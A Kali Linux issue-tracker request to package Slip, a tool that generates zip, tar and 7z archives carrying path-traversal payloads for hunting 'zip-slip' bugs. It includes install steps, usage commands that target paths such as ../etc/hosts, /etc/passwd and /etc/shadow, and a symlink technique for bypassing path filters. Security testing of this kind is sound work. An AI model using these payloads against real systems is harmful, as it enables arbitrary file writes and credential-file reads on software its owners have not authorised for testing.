View Issue Details

ID: 0009165
Project: Kali Linux
Category: New Tool Requests
View Status: public
Last Update: 2025-10-03 14:51
Reporter: 0xless
Assigned To:
Priority: normal
Severity: minor
Reproducibility: have not tried
Status: new
Resolution: open
Summary: 0009165: Slip - create malicious archive files containing path traversal payloads. It supports zip, tar, 7z and zip-like
Description

Slip is a malicious archive generator to exploit path traversal vulnerabilities.

Version to be added: v1.0.0 (https://github.com/0xless/slip/releases/tag/v1.0.0)
Homepage: The project lives in https://github.com/0xless/slip
Download: Available on github at https://github.com/0xless/slip
Author: 0xless (Matteo Cosentino)
License: GPL 3.0
Description:
Slip makes it easy to create multiple archives containing path traversal payloads in the file name fields, so that extracting the archive becomes a potentially dangerous operation. With this approach it is possible to find and exploit "zip-slip" type vulnerabilities.

Motivation

Most commonly used archive tools do not allow path traversal payloads in archive entry names, which makes it slow and tedious to create malicious archives when hunting for vulnerabilities in a piece of software. With slip it is convenient to create highly customizable archives that fit most situations.

Features

Slip is a feature-rich script capable of satisfying most "zip-slip" hunting needs. In particular, the script:

Supports zip, tar, 7z and zip-like (jar, war, apk, ipa, ...) archives
Allows hunting for arbitrary file write and arbitrary file read vulnerabilities
Supports the generation of path traversal payloads to search for a file at different depths in the filesystem
Implements a mass-find mode that uses a payload dictionary to generate the archive
Allows cloning an existing archive so that malicious payloads can be added to more complex, pre-existing archives

Dependencies: Python libraries py7zr==0.20.0 and click

Similar tools: https://github.com/ptoomey3/evilarc seems to be the best-known tool for the job.

Activity: Tool development started a couple of years ago. There are a few planned features to be added, but I just released the first stable version. I'm the maintainer of the repo and I'm available to fix bugs.

How to install:
Get release v1.0.0 at https://github.com/0xless/slip/archive/refs/tags/v1.0.0.zip
Extract the archive and install the requirements with python3 -m pip install -r requirements.txt; this installs py7zr==0.20.0 and click.
Any other libraries used should already be available on the system.

How to use:
Usage example

Create a tar.bz2 archive containing 2 explicit paths:

python3 slip.py --archive-type tar --compression bzip2 --paths "../etc/hosts, ../../etc/hosts" --file-content "foo" archive.tar

Create a zip archive containing an explicit path and an explicit symlink:

python3 slip.py --archive-type zip --compression deflate --paths "../etc/hosts" --symlinks "../etc/shadows" --file-content "foo" archive.zip

Create a 7z archive with a named symlink:

python3 slip.py --archive-type 7z --symlinks "../etc/hosts;linkname" archive.7z

This technique is really useful when directory traversal payloads are filtered in paths but not in symlinks: an arbitrary file write can still be achieved by referring to the named symlink as part of a path (e.g. symlink: ../etc/;foo, path: foo/hosts, which lands in ../etc/hosts when the extractor follows the symlink).

Create an archive from an existing one and add a new payload:

python3 slip.py --clone source.7z --paths "foo" --file-content "bar" archive.7z

Create an archive from a JSON file and add new payloads:

python3 slip.py --json-file definition.json --paths "foo0,bar00" --symlinks "/etc/passwd,/etc/shadow" --file-content "buzz" archive.zip

With definition.json containing:

[
{
"file-name": "../foo1",
"content":"bar",
"type":"path"
},
{
"file-name": "../../foo2",
"content":"bar",
"type":"path"
},
{
"file-name": "/etc/passwd;foo3",
"content":"IGNORED",
"type":"symlink"
},
{
"file-name": "foo4",
"content":"Y2lhbwo=",
"base64": true,
"type":"path"
}
]

Supported fields are file-name, content, base64 and type. If base64 is true, content is decoded from base64 before being written. type can only be path or symlink; for symlink entries, content is ignored.

Create a tar.bz2 archive with 4 payloads to search for "config.ini" at 3 different depths (this one also uses the Windows flavor of dot-dot-slash):

python3 slip.py --archive-type tar --compression bzip2 --paths "config.ini" --search 3 --dotdotslash '..\' --file-content "foo" archive.tar

The archive will contain:

config.ini
..\config.ini
..\..\config.ini
..\..\..\config.ini

NOTE: --search does not support named symlinks, to prevent the generated named symlinks from overwriting each other.

Create a tar archive with payloads from the default mass-find dictionary to find the /etc/hosts file:

python3 slip.py --archive-type tar --mass-find "/etc/hosts" --mass-find-mode symlinks archive.tar

Packaged: The tool is not yet packaged for Debian.

Activities

There are no notes attached to this issue.

Issue History

Date Modified Username Field Change
2025-05-09 16:03 0xless New Issue
2025-05-12 12:06 g0tmi1k Summary Slip is a CLI tool to create malicious archive files containing path traversal payloads. It supports zip, tar, 7z and zip-like ( => Slip - create malicious archive files containing path traversal payloads. It supports zip, tar, 7z and zip-like
2025-10-03 14:51 g0tmi1k View Status private => public